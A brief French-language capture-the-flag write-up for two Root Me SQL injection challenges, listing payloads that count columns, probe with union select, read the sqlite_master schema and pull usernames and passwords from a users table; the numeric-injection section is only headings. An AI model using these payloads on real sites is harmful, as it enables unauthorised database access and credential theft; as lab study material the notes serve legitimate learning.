RootME

SQL injection - String

Vérifier le nombre de colonnes autorisées

1’ order by 1--

Vérifier quelles colonnes peuvent être exploitées

1union select 1,2--

Trouver les noms des colonnes

1union select 1,sql from sqlite_master--

Extraire des informations sensibles

1union select username,password FROM users--

Cela extrait les informations des colonnes username et password de la table users.

SQL injection - Numérique

Vérifier si la base de données est vulnérable

/web-serveur/ch18/?action=news&news_id=3'

Déterminer le nombre de colonnes

Il y a 3 colonnes

Trouver le nom des colonnes

Trouver les noms exacts des colonnes

Extraire les informations


Last updated